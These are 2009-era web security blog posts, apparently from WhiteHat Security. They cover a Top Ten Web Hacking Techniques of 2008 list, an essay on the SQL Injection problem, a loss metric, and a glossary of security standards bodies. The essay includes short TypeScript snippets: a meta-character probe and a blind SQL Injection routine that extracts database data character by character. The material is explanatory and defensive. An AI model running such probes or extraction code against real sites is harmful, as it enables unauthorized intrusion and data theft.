4) Penetration testing is dead, long live penetration testing, and here I thought Brian Chess (Fortify Software) was calling for the death of my business. :) Brian does a good job refining comments he made earlier about how pen-testing must adapt or die.
"People are now spending more money on getting code right in the first place than they are on proving it's wrong. However, this doesn't signal the end of the road for penetration testing, nor should it, but it does change things."
This is hard to disagree with and he even takes time to share some nice words about us...
"If you'd like a sneak preview of what the future holds, check out the work White Hat Security has done to integrate their vulnerability measurement service with Web application firewalls. This is attack and defence working together in a creative new way."
5) Rich Mogull and Adrian Lane of Securosis release a monster! Building a Web Application Security Program. Amazing that it has taken this long for the Web security industry to produce a document of this kind and quality. If you don't have a plan in place, don't know where to begin, or find that generic "software security" guidance just isn't going to get it done for your enterprise, this document is the one for you.
6) Isn't it fun to run a social network? Religious wars erupt on Facebook, in this case involving some Web hacking. “A group named 'Christians on Facebook' has been taken over it seems by pro-Islam members.” Reminds me of the days back at Yahoo!
7) This quote by Pete Lindstrom I found particularly thought provoking...
“If finding vulnerabilities makes software more secure, why do we assert that software with the highest vulnerability count is less secure (than, e.g., a competitor)?”
8) Criminal uses Google Earth to perform recon, searching for lead roof tiles, which he would steal and sell to scrap metal dealers.
9) If you care about such things, you already know about it and it's old news. Heartland, RBS WorldPay no longer PCI compliant.
10) Software tools do NOT scale! Neil MacDonald of Gartner was in this case talking about static application security testing (SAST) tools: “A tool alone cannot solve what fundamentally is a development process problem.” Can I get an AMEN! The very same issue plagues dynamic testing tools, as I blogged a while back. Technology helps, but people matter most.
Monday, February 23, 2009
Top Ten Web Hacking Techniques of 2008 (Official)
We searched far and wide collecting as many Web Hacking Techniques published in 2008 as possible -- ~70 in all. These new and innovative techniques were analyzed and ranked based upon their novelty, impact, and pervasiveness. The 2008 competition was exceptionally fierce and our panel of judges (Rich Mogull, Chris Hoff, H D Moore, and Jeff Forristal) had their work cut out for them. For any researcher, or "breaker" if you prefer, simply the act of creating something unique enough to appear on the list is no small feat. That much should be considered an achievement. In the end, ten Web hacking techniques rose head and shoulders above the rest.
Supreme honors go to Billy Rios, Nathan McFeters, Rob Carter, and John Heasman for GIFAR! The judges were convinced their work stood out amongst the field. Beyond industry recognition, they also will receive the free pass to Black Hat USA 2009 (generously sponsored by Black Hat)! Now they have to fight over it. ;)
Congratulations to all!
Coming up at SnowFROC AppSec 2009 and RSA Conference 2009 it will be my great privilege to highlight the results. Each of the top ten techniques will be described in technical detail: how they work, what they can do, who they affect, and how best to defend against them. The opportunity provides a chance to get a closer look at the new attacks that could be used against us in the future -- some of which already have been.
Top Ten Web Hacking Techniques of 2008!
1. GIFAR
(Billy Rios, Nathan McFeters, Rob Carter, and John Heasman)
2. Breaking Google Gears' Cross-Origin Communication Model
(Yair Amit)
3. Safari Carpet Bomb
(Nitesh Dhanjani)
4. Clickjacking / Videojacking
(Jeremiah Grossman and Robert Hansen)
5. A Different Opera
(Stefano Di Paola)
6. Abusing HTML 5 Structured Client-side Storage
(Alberto Trivero)
7. Cross-domain leaks of site logins via Authenticated CSS
(Chris Evans and Michal Zalewski)
8. Tunneling TCP over HTTP over SQL Injection
(Glenn Wilkinson, Marco Slaviero and Haroon Meer)
9. ActiveX Repurposing
(Haroon Meer)
10. Flash Parameter Injection
(Yuval Baror, Ayal Yogev, and Adi Sharabani)
The List
- CUPS Detection
- CSRFing the uTorrent plugin
- Clickjacking / Videojacking
- Bypassing URL Authentication and Authorization with HTTP Verb Tampering
- I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)
- Safari Carpet Bomb
- Flash clipboard Hijack
- Flash Internet Explorer security model bug
- Frame Injection Fun
- Free MacWorld Platinum Pass? Yes in 2008!
- Diminutive Worm, 161 byte Web Worm
- SNMP XSS Attack (1)
- Res Timing File Enumeration Without JavaScript in IE7.0
- Stealing Basic Auth with Persistent XSS
- Smuggling SMTP through open HTTP proxies
- Collecting Lots of Free 'Micro-Deposits'
- Using your browser URL history to estimate gender
- Cross-site File Upload Attacks
- Same Origin Bypassing Using Image Dimensions
- HTTP Proxies Bypass Firewalls
- Join a Religion Via CSRF
- Cross-domain leaks of site logins via Authenticated CSS
- JavaScript Global Namespace Pollution
- GIFAR
- HTML/CSS Injections - Primitive Malicious Code
- Hacking Intranets Through Web Interfaces
- Cookie Path Traversal
- Racing to downgrade users to cookie-less authentication
- MySQL and SQL Column Truncation Vulnerabilities
- Building Subversive File Sharing With Client Side Applications
- Firefox XML injection into parse of remote XML
- Firefox cross-domain information theft (simple text strings, some CSV)
- Firefox 2 and WebKit nightly cross-domain image theft
- Browser's Ghost Busters
- Exploiting XSS vulnerabilities on cookies
- Breaking Google Gears' Cross-Origin Communication Model
- Flash Parameter Injection
- Cross Environment Hopping
- Exploiting Logged Out XSS Vulnerabilities
- Exploiting CSRF Protected XSS
- ActiveX Repurposing, (1, 2)
- Tunneling tcp over http over sql-injection
- Arbitrary TCP over uploaded pages
- Local DoS on CUPS to a remote exploit via specially-crafted webpage (1)
- JavaScript Code Flow Manipulation
- Common localhost dns misconfiguration can lead to "same site" scripting
- Pulling system32 out over blind SQL Injection
- Dialog Spoofing - Firefox Basic Authentication
- Skype cross-zone scripting vulnerability
- Safari pwns Internet Explorer
- IE "Print Table of Links" Cross-Zone Scripting Vulnerability
- A different Opera
- Abusing HTML 5 Structured Client-side Storage
- SSID Script Injection
- DHCP Script Injection
- File Download Injection
- Navigation Hijacking (Frame/Tab Injection Attacks)
- UPnP Hacking via Flash
- Total surveillance made easy with VoIP phone
- Social Networks Evil Twin Attacks
- Recursive File Include DoS
- Multi-pass filters bypass
- Session Extending
- Code Execution via XSS (1)
- Redirector’s hell
- Persistent SQL Injection
- JSON Hijacking with UTF-7
- SQL Smuggling
- Abusing PHP Sockets (1, 2)
- CSRF on Novell GroupWise WebAccess
Sunday, February 22, 2009
SQL Injection, eye of the storm
Originally published by Security Horizon in the Winter 2009 edition of Security Journal.
In 2008 SQL Injection became the leading method of malware distribution, infecting millions of Web pages and foisting browser-based exploits upon unsuspecting visitors. The ramifications to online businesses include data loss, PCI fines, downtime, recovery costs, brand damage, and revenue decline when search engines blacklist them. According to WhiteHat Security, 16 percent of websites are vulnerable to SQL Injection. This is likely under-reported given that the statistics are largely based on top-tier Web properties that employ a website vulnerability management solution to identify the problem. The majority of websites do not, and as such may be completely unaware of the extent of the issue. In addition, some recommended security best practices have ironically benefited malicious hackers. Websense now reports that "60 percent of the top 100 most popular Web sites have either hosted or been involved in malicious activity in the first half of 2008." Let’s examine the forces that have aligned to create the storm that allows SQL Injection to thrive.
Any custom Web application that lacks proper input validation, fails to use parameterized SQL statements, and/or creates dynamic SQL with user-supplied data potentially leaves itself open to SQL Injection attacks -- unauthorized commands passed to back-end databases. When Rain Forest Puppy first described SQL Injection ten years ago, on Christmas Day 1998, it was a targeted one-off attack capable of exploiting only a single website at a time. Custom Web applications contain custom vulnerabilities and require custom exploits. Successfully extracting data out of an unfamiliar database is different in each instance and greatly aided by error messages revealing snippets of server-side code.
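As a contrast, here is a minimal sketch of the vulnerable string-building pattern next to its parameterized alternative, written in TypeScript against the node-postgres client; the table, columns, and connection details are hypothetical stand-ins.

```typescript
import { Client } from "pg"; // node-postgres; any driver with placeholders behaves the same way

// Vulnerable pattern: user input is concatenated directly into the SQL text,
// so name = "x' OR '1'='1" rewrites the query itself.
async function findUserUnsafe(db: Client, name: string) {
  return db.query(`SELECT id, email FROM users WHERE name = '${name}'`);
}

// Safer pattern: the placeholder keeps data separate from SQL structure,
// so the same input is treated purely as a value.
async function findUserSafe(db: Client, name: string) {
  return db.query("SELECT id, email FROM users WHERE name = $1", [name]);
}
```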
To solve the SQL Injection problem, preferably in the code, first we must identify what is broken. The easiest method to date has been remote black-box testing: submitting meta-characters (single quotes and semicolons) into Web applications. If the website returns a recognizable response, such as an ODBC error message, there is a high probability that a weakness exists. Comprehensive security testing, typically aided by black-box vulnerability scanners, performs the same procedure on every application input point, including URL query parameters, POST data, cookies, etc., and is repeated with each code update. This software security testing process is also now one of the assessment options mandated by PCI-DSS section 6.6.
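A toy version of that black-box probe might look like the sketch below, where the target URL, parameter name, and error signatures are placeholders; real scanners exercise every input point and match far more response patterns. Only run something like this against systems you are authorized to test.

```typescript
// Submit SQL meta-characters into a single parameter and look for database
// error signatures in the response body.
const PROBES = ["'", "''", "';--"];
const ERROR_SIGNATURES = /ODBC|SQL syntax|unclosed quotation mark|ORA-\d{5}/i;

async function probeParameter(url: string, param: string): Promise<boolean> {
  for (const probe of PROBES) {
    const res = await fetch(`${url}?${param}=${encodeURIComponent(probe)}`);
    const body = await res.text();
    if (ERROR_SIGNATURES.test(body)) {
      return true; // recognizable error response: high probability of a weakness
    }
  }
  return false;
}
```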
In the wake of highly publicized compromises like the 2006 incident at CardSystems, a back-end credit card transaction processor, in which millions of stolen credit card numbers fell into the wrong hands, website owners were strongly encouraged to update their Web application code and suppress error messages to defend against SQL Injection attacks. Many implemented solely the latter since it only required a simple configuration change, hindering the bad guy’s ability to identify SQL Injection vulnerabilities. Since the vulnerabilities couldn’t be found easily, perhaps this contributed to incorrectly training developers that security through obscurity was enough. Widespread attacks were not seen as prevalent enough to justify a serious software security investment. Despite cutting-edge Blind SQL Injection research helping to improve black-box testing, error message suppression contributed to three very important side effects:
- Black-box vulnerability scanner false-positive and false-negative rates skyrocketed.
- SQL Injection became significantly harder to identify, but ironically not to exploit.
- Extracting data out of a database became far more laborious than injecting data in (a rough sketch of why follows this list).
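To illustrate that last point, here is a minimal sketch of blind, boolean-inference extraction in TypeScript. The target URL, parameter, "true page" marker, and SQL dialect are all hypothetical; the takeaway is simply that once error messages are gone, every character of data costs dozens of requests inferred from yes/no page differences.

```typescript
// Toy blind SQL Injection inference, assuming a page that renders a
// recognizable "true" marker when the injected condition holds.
// For authorized testing and illustration only.
async function conditionHolds(url: string, clause: string): Promise<boolean> {
  const res = await fetch(`${url}?id=${encodeURIComponent(`1 AND ${clause}`)}`);
  return (await res.text()).includes("Welcome back"); // hypothetical "true" page marker
}

// Recover a single character (here, of the database version string) by
// asking up to ~95 yes/no questions.
async function extractChar(url: string, position: number): Promise<string> {
  for (let code = 32; code < 127; code++) {
    const clause = `ASCII(SUBSTRING(@@version,${position},1))=${code}`;
    if (await conditionHolds(url, clause)) return String.fromCharCode(code);
  }
  return "?";
}
```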
For example, when vulnerability assessments are conducted on production systems, a cardinal rule must be followed: “Do no harm.” This often requires that testing rates be limited (X number of requests per second), testing windows be respected (usually during off-peak hours), and tests be nondestructive. It should go without saying that we do not want to crash websites or fill databases with undesirable content. Malicious hackers have no such restrictions as they may test however they want, whenever they want, for as long as they want. The other disadvantage for website defenders is that they must be 100% accurate at finding and fixing every issue all the time, while the attacker need only exploit a single missed issue. This is an unfortunate but inescapable reality in Web security, and why a frequent and comprehensive testing approach is vital.
Source code review (aka white-box testing) is the other option to locate SQL Injection vulnerabilities and is often able to peer deeper into the problem than black-box testing. Of course, you must have access to the source code. Before considering this as a scalable solution, begin by asking yourself if executive management would allocate enough resources to perform source code reviews on every website every time it changes. Thinking globally, let’s consider that there are over 186 million websites. While not all are “important,” if 16% had just a single vulnerability as previously cited, that means a staggering 30 million issues are in circulation. Would it be reasonable to project that finding (not fixing) each unique issue through white-box testing, even assisted by automation, would require $100 in personnel and technology costs? If so, we are talking about at least a $3 billion price tag simply to locate SQL Injection -- to say nothing of other more prevalent issues such as Cross-Site Scripting and Cross-Site Request Forgery that will be left undiscovered.
Secure software education is another valuable long-term strategy that will help prevent another 30 million vulnerabilities being added to the pile over the next 15 years, but it will not provide a short-term fix to the problem. Currently, there are roughly 17 million developers worldwide who are not educated on the basic concepts of secure coding that could help them tackle SQL Injection and other issues. Would $500 per developer be an acceptable rate for professional training (commercial 2-day classes typically start at $1,000 and up)? If so, the market must be prepared to make an $8.5 billion investment and then wait for everyone to come up to speed. Obviously the private sector is not going to shoulder such a financial burden alone, not in any economy, let alone in a recession. The fact is education costs must be shared amongst colleges, enterprises, vendors, and developers themselves, or offset through materials made freely available by organizations such as OWASP and WASC.
The climate for SQL Injection vulnerabilities has all the makings of a perfect storm, one we are already experiencing. The issue is extremely dangerous, incredibly pervasive, difficult to identify, easy to exploit, and expensive to fix. Over the last 15 years organizations have accumulated a lot of Web security debt that eclipses our currently estimated spending of ~$300 million, combining outlays for scanning tools, professional services, training, and Web application firewalls. Perhaps we should ask president-elect Obama for a Web security bailout. Not likely. The fact is not every organization will invest adequately to protect themselves, at least not overnight. Those who do not will undoubtedly become the low-hanging fruit the bad guys target first. The smart money says vast numbers of compromises will continue throughout 2009.
For those wishing to do all they can to prevent compromises, the answer is adopting a holistic approach addressing overall Web security, including SQL Injection. While fully articulating the details of each solution is beyond the scope of this article, it is important to highlight several of the most important ones and why they are good ideas.
- Security throughout the Software Development Life-Cycle, because an ounce of prevention is worth a pound of cure.
- Education, teach a man to fish.
- Vulnerability Assessment, because you cannot secure what you cannot measure.
- Web Application Firewalls, because software is not and will never be perfect.
- Web Browser security, because one must be able to protect themselves against a hostile website.
Thursday, February 05, 2009
Indirect Hard Losses
Indirect Hard Losses is an estimation of the decrease in Web transactions of a certain class of customer, specifically those whose security/privacy have been compromised in the past, compared to those who have not. I first learned about this metric from Robert "RSnake" Hansen (SecTheory), but didn’t know it had a name until I spoke with Laura Mather (Silver Tail Systems). Indirect Hard Losses is rarely discussed, though I suspect it is internally measured, but not published publicly. As stated by InformationWeek regarding a Ponemon Institute study on the Cost of a Data Breach, “Customers, it seems, lose faith in organizations that can't keep data safe and take their business elsewhere.” The next logical question is how much?
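As a back-of-the-envelope illustration (with entirely invented numbers and hypothetical field names), the metric reduces to comparing average revenue-generating activity between the two customer populations:

```typescript
// Toy computation of Indirect Hard Losses: the fractional decline in activity
// among previously compromised customers relative to those with no incident.
interface Customer {
  compromised: boolean;
  monthlyTransactions: number;
}

function indirectHardLoss(customers: Customer[]): number {
  const avg = (xs: number[]) =>
    xs.reduce((sum, x) => sum + x, 0) / Math.max(xs.length, 1);
  const hit = customers.filter(c => c.compromised).map(c => c.monthlyTransactions);
  const rest = customers.filter(c => !c.compromised).map(c => c.monthlyTransactions);
  return 1 - avg(hit) / avg(rest); // e.g. 0.2 means ~20% less activity
}

// Invented example: 12 vs 15 transactions per month -> 20% indirect hard loss.
console.log(indirectHardLoss([
  { compromised: true, monthlyTransactions: 12 },
  { compromised: false, monthlyTransactions: 15 },
]));
```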
Web page malware infections, phishing scams, and website data compromises are common and effective cyber crimes. All the largest online brands have suffered at least one incident compromising the security/privacy of some portion of their customer base. While victimized customers can be made whole again by reimbursing money stolen, replacing lost merchandise, restoring account access, and paying for credit monitoring -- the event undoubtedly makes a lasting impression about the brand. A business may not lose the customer completely, but from my conversations, a nontrivial decline in revenue-generating activity can clearly be measured. Unfortunately I’m unable to reveal names or cite figures as evidence.
Consider for a moment if a social network user’s account is taken over and offensive messages are sent, privacy is violated, and general embarrassment ensues. This is a frequent occurrence, just ask Soulja Boy, Kanye West, Lil Kim, Britney Spears, Fox News and scores of other non-celebrities. Would it be unreasonable to expect this might cause a user to spend less time on the website? For banking customers, perhaps they’d carry smaller account balances and refrain from signing up for new services. Ecommerce retail customers could potentially spend less, less often. All these tendencies would lead to Indirect Hard Losses.
Anonymously or otherwise, anyone want to provide some anecdotal loss percentages that they’ve seen?
Who's who and what's what

Web Application Security Consortium (WASC)
An international group of experts, industry practitioners, and organizational representatives who produce open source and widely agreed upon best-practice security standards for the World Wide Web.
A group of industry-leading Web security experts whose members are elected through a meritocracy-based system. WASC tends to initiate projects that are of significant importance to Web security, require a high degree of domain expertise, and depend upon the collective involvement of key participants -- efforts not easily performed by wide-open community groups. Upon release these projects are exceptionally well peer reviewed, provide quality results, and typically become immediately supported by the industry at large.
Web Application Firewall Evaluation Criteria (WAFEC)
An industry standard testing criteria for evaluating the quality of web application firewall solutions. The goal of this project is to develop a detailed web application firewall evaluation criteria; a testing methodology that can be used by any reasonably skilled technician to independently assess the quality of a WAF solution.
Web Application Firewalls (WAF) can be an extremely complex set of technologies and difficult to evaluate in a fair and straightforward manner. The WAFEC v1 provides a framework for how WAFs may be compared and what areas are most important to focus on. Not a product review in and of itself, it’s instead a guideline to follow. A version 2 update should begin sometime early this year.
Web Application Security Scanner Evaluation Criteria (WASSEC)
A set of guidelines to evaluate web application security scanners on their identification of web application vulnerabilities and its completeness. It will cover things like crawling, parsing, session handling, types of vulnerabilities and information about those vulnerabilities. This document shall evaluate the technical aspects of the web application security scanners and NOT the features provided by it. This document should define the minimum criteria to be followed by a web application scanner.
Similar to WAFEC, Web application vulnerability scanners can be exceptionally complex and difficult to evaluate. The WASSEC, currently in active development, provides a framework for how scanners may be compared and what areas should be focused upon. This is not a product review exercise, but instead a guideline to follow, perhaps to perform such reviews.
Web Security Threat Classification (WASC-TC)
A cooperative effort to clarify and organize the threats to the security of a web site. The members of the Web Application Security Consortium have created this project to develop and promote industry standard terminology for describing these issues. Application developers, security professionals, software vendors, and compliance auditors will have the ability to access a consistent language for web security related issues.
An extremely comprehensive taxonomy of all the Web-based attacks a website might expect to endure, with a strong emphasis on agreed-upon terminology, definitions, and structure. The Threat Classification may be considered a superset of the OWASP Top Ten. The content has been heavily vetted and is widely supported by vulnerability scanners, Web application firewalls, consultants, and enterprises. The TC purposely left out notions of vulnerability prevalence and default severity ratings. Version 2 is presently in active development and nearing completion, and is expected to be a substantial improvement upon the original.
Open Web Application Security Project (OWASP)
The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. Our mission is to make application security "visible," so that people and organizations can make informed decisions about application security risks.
An organization focused largely on the software development aspects of Web Application Security, spanning several continents through locally organized member chapters and conferences, and enjoying a large membership base. OWASP is an excellent resource for developers and security practitioners, especially those who are new to Web security and looking to get engaged with like-minded peers working on similar efforts.
Top Ten
Provides a powerful awareness document for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.
Designed to be an awareness-building document, the Top Ten list is a combination of Web-based vulnerability prevalence tempered by expert analysis taking likely impact and exploitation into consideration. The Top Ten is not meant to be comprehensive or the foundation of any standard; however, it is cited as such in the PCI-DSS standard. Technically the document should be considered a subset of the Web Security Threat Classification. For security managers requiring something simple to pass around to upper management or developer groups unaccustomed to Web security, this is a great resource.
MITRE
A not-for-profit organization chartered to work in the public interest. As a national resource, we apply our expertise in systems engineering, information technology, operational concepts, and enterprise modernization to address our sponsors' critical needs.
CWE
Provides a unified, measurable set of software weaknesses that is enabling more effective discussion, description, selection, and use of software security tools and services that can find these weaknesses in source code and operational systems as well as better understanding and management of software weaknesses related to architecture and design.
A dictionary of software weakness terminology intended for developers and security practitioners. While CWE includes many aspects of Web security, its scope is much larger. In many ways this can be considered a superset of the WASC Threat Classification, even while the terminology might not map identically. Expect an increasing number of industry projects and standards to adopt this nomenclature when discussing security topics or organizing and naming findings.
CVE
A dictionary of publicly known information security vulnerabilities and exposures. CVE's common identifiers enable data exchange between security products and provide a baseline index point for evaluating coverage of tools and services.
Publicly disclosed vulnerabilities in commercial and open source software are captured by CVE in a dictionary with numbered identifiers. CVE does not include vulnerabilities in custom Web applications. Most network vulnerability scanners will map their findings to CVE IDs.
CWE/SANS Top 25 Most Dangerous Programming Errors (2009)
A list of the most significant programming errors that can lead to serious software vulnerabilities. They occur frequently, are often easy to find, and easy to exploit. They are dangerous because they will frequently allow attackers to completely take over the software, steal data, or prevent the software from working at all.
MITRE (via CWE) and SANS (via the SANS Top 20) joined forces to create a Top 25 list out of the hundreds of issues listed within the CWE. About half of the list is Web-based, roughly similar to the OWASP Top Ten, and the rest deal with memory handling issues common to commercial and open source software. Again, it is not meant to be comprehensive, only a list of the more common and damaging issues. Think OWASP Top Ten in focus, but for all software types.
SANS
Established in 1989 as a cooperative research and education organization. Its programs now reach more than 165,000 security professionals around the world.
Top 20
A consensus list of vulnerabilities that require immediate remediation. It is the result of a process that brought together dozens of leading security experts. They come from the most security-conscious government agencies in the UK, US, and Singapore; the leading security software vendors and consulting firms; the top university-based security programs; the Internet Storm Center, and many other user organizations.
The “20” seems to be a misnomer now; the list is segmented into a variety of categories including client-side, server-side, network devices, etc. Each category lists a handful of major pressing threats that are a combination of prevalence, likely severity, and odds of exploitation based upon expert analysis. For instance, under “Web Applications” are PHP Remote File Includes, SQL Injection, Cross-Site Scripting, and Cross-Site Request Forgery. Not meant to be comprehensive, but certainly things not to be overlooked. The 2008 release is expected to be forthcoming.
WASC RSA Meet-Up 2009!
For those going to the RSA Conference (San Francisco / April 20 – 24) who want to mingle with fellow Web application security people, the WASC meet-up is the place to be. Free drinks and appetizers will be served (sponsored by WhiteHat Security), and if it's anything like last year it's sure to rock! WASC meet-ups are rare opportunities to see those we otherwise only communicate with virtually, shoot some pool, and generally have a good time with people of similar security interests. Everyone is welcome, but remember the space at Jillian's is extremely limited. RSVP soon by filling out the form.
WASC RSA Meet-up
Wednesday, April 22, 2009
12:00 pm to 2:00 PM
Jillian's @Metreon
101 Fourth Street, San Francisco
415.369.6101
RSVP by April 17, 2009*
*Please stop by the WhiteHat booth to receive your special entry pass into the party.
Tuesday, January 27, 2009
Some unanswered questions

- Do people trust QSAs who consider PCI-DSS 6.6 met if their organization only uses a network vulnerability scanner with a few web application security checks?
- Do organizations with a more mature software security program tend to deploy Web Application Firewalls more often than those who don't?
- As a result of the economic downturn, what notable security projects are being cut from last year's budget?
- Will Cross-Site Request Forgery security features be adopted through HTTP standardization, ad-hoc by Web browser vendors, or left solely up to website owners?
- Will secure code purchasing standards lead to secure code?
Monday, January 26, 2009
Calling all Researchers! Send in the Top Web Hacking Techniques of 2008
It's time once again to create the Top Ten Web Hacking Techniques of the past year. Every year Web security produces a plethora of new and extremely clever hacking techniques (loosely defined, not specific incidents), many of which are published in hard to find locations. 2008 was no different. As we've done for the past two years, we're looking for the best of the best. This effort serves as a way to create a centralized community reference and recognize those exceptional researchers who have contributed to our collective knowledge.
This year is special, because the researcher who places #1 will not only receive praise amongst his peers, but also receive one free pass to attend the BlackHat USA Briefings 2009! Over $1,000 (US) value. Generously sponsored by BlackHat. Winners will be chosen by a panel of judges (Rich Mogull, Chris Hoff, HD Moore, Jeff Forristal) on the basis of novelty, impact, and pervasiveness.
We’re also going to need your help. Below we’re building the living list of everything found so far. If anything is missing, and we’re positive there is because last year had over 80, we’d appreciate it if you could post a comment containing the link. Thank you and good luck!
The List
- Cross-Site Printing (2007 issue)
- CUPS Detection
- CSRFing the uTorrent plugin
- Clickjacking / Videojacking
- Bypassing URL Authentication and Authorization with HTTP Verb Tampering
- I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)
- Safari Carpet Bomb
- Flash clipboard Hijack
- Flash Internet Explorer security model bug
- Frame Injection Fun
- Free MacWorld Platinum Pass? Yes in 2008!
- Diminutive Worm, 161 byte Web Worm
- SNMP XSS Attack (1)
- Res Timing File Enumeration Without JavaScript in IE7.0
- Stealing Basic Auth with Persistent XSS
- Smuggling SMTP through open HTTP proxies
- Collecting Lots of Free 'Micro-Deposits'
- Using your browser URL history to estimate gender
- Cross-site File Upload Attacks
- Same Origin Bypassing Using Image Dimensions
- HTTP Proxies Bypass Firewalls
- Join a Religion Via CSRF
- Cross-domain leaks of site logins via Authenticated CSS
- JavaScript Global Namespace Pollution
- GIFAR
- HTML/CSS Injections - Primitive Malicious Code
- Hacking Intranets Through Web Interfaces
- Cookie Path Traversal
- Racing to downgrade users to cookie-less authentication
- MySQL and SQL Column Truncation Vulnerabilities
- Building Subversive File Sharing With Client Side Applications
- Firefox XML injection into parse of remote XML
- Firefox cross-domain information theft (simple text strings, some CSV)
- Firefox 2 and WebKit nightly cross-domain image theft
- Browser's Ghost Busters
- Exploiting XSS vulnerabilities on cookies
- Breaking Google Gears' Cross-Origin Communication Model
- Flash Parameter Injection
- Cross Environment Hopping
- Exploiting Logged Out XSS Vulnerabilities
- Exploiting CSRF Protected XSS
- ActiveX Repurposing, (1, 2)
- Tunneling tcp over http over sql-injection
- Arbitrary TCP over uploaded pages
- Local DoS on CUPS to a remote exploit via specially-crafted webpage (1)
- JavaScript Code Flow Manipulation
- Common localhost dns misconfiguration can lead to "same site" scripting
- Pulling system32 out over blind SQL Injection
- Dialog Spoofing - Firefox Basic Authentication
- Skype cross-zone scripting vulnerability
- Safari pwns Internet Explorer
- IE "Print Table of Links" Cross-Zone Scripting Vulnerability
- A different Opera
- Abusing HTML 5 Structured Client-side Storage
- SSID Script Injection
- DHCP Script Injection
- File Download Injection
- Navigation Hijacking (Frame/Tab Injection Attacks)
- UPnP Hacking via Flash
- Total surveillance made easy with VoIP phone
- Social Networks Evil Twin Attacks
- Recursive File Include DoS
- Multi-pass filters bypass
- Session Extending
- Code Execution via XSS (1)
- Redirector’s hell
- Persistent SQL Injection
- JSON Hijacking with UTF-7
- SQL Smuggling
- Abusing PHP Sockets (1, 2)
- CSRF on Novell GroupWise WebAccess